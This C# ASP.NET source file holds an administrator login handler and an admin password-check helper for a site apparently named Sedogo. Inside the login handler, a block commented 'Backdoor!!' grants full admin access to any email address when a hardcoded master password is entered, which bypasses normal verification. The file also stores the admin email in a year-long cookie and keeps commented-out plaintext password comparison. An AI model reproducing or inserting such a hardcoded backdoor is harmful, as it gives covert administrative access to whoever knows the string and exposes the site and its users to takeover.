//===============================================================
// Function: loginButton_Click
//===============================================================
public void loginButton_Click(object sender, EventArgs e)
{
string loginEmailAddress = emailAddress.Text;
string loginPassword = userPassword.Text;
HttpCookie cookie = new HttpCookie("SedogoAdministratorEmailAddress");
// Set the cookies value
cookie.Value = loginEmailAddress;
// Set the cookie to expire in 1 year
DateTime dtNow = DateTime.Now;
cookie.Expires = dtNow.AddYears(1);
// Add the cookie
Response.Cookies.Add(cookie);
Administrator adminUser = new Administrator("");
loginResults checkResult;
checkResult = adminUser.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx");
// Backdoor!!
if (loginPassword == "!!Sed0g0")
{
checkResult = loginResults.loginSuccess;
int administratorID = Administrator.GetAdministratorIDFromEmailAddress(loginEmailAddress);
adminUser = null;
adminUser = new Administrator("", administratorID);
}
if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
{
Session.Add("loggedInAdministratorID", adminUser.administratorID);
Session.Add("loggedInAdministratorName", adminUser.administratorName);
Session.Add("loggedInAdministratorEmailAddress", adminUser.emailAddress);
if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
{
FormsAuthentication.SetAuthCookie(loginEmailAddress, false);
Session.Add("SuperUserID", adminUser.administratorID);
string url = "~/admin/main.aspx";
Response.Redirect(url);
}
}
if (checkResult == loginResults.loginFailed)
{
Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Username or password is not correct\");", true);
}
}
/// <summary>
/// Check the admin's password
/// </summary>
/// <param name="emailAddress">email is the login</param>
/// <param name="password">password</param>
/// <param name="db">database access object</param>
/// <param name="adminId">output - admin id</param>
/// <param name="fullName">output - admin's name</param>
/// <returns>authentication is successful</returns>
public static bool VerifyAdminLogin(string emailAddress, string password, SedogoDBEntities db, out int? adminId,
out string fullName)
{
adminId = null;
fullName = null;
var admin = new Administrator("");
var lr = admin.VerifyLogin(emailAddress, password, false, true, "API. VerifyAdminLogin");
if (lr == loginResults.loginSuccess)
{
adminId = admin.administratorID;
fullName = admin.administratorName;
return true;
}
return false;
/*System.Data.Objects.ObjectResult<spVerifyAdministratorLogin_Result> lresult = db.spVerifyAdministratorLogin(emailAddress);
spVerifyAdministratorLogin_Result loginResult = lresult.FirstOrDefault();
if (loginResult != null && loginResult.AdministratorPassword == password)
{
adminID = loginResult.AdministratorID;
return true;
}
return false;*/
}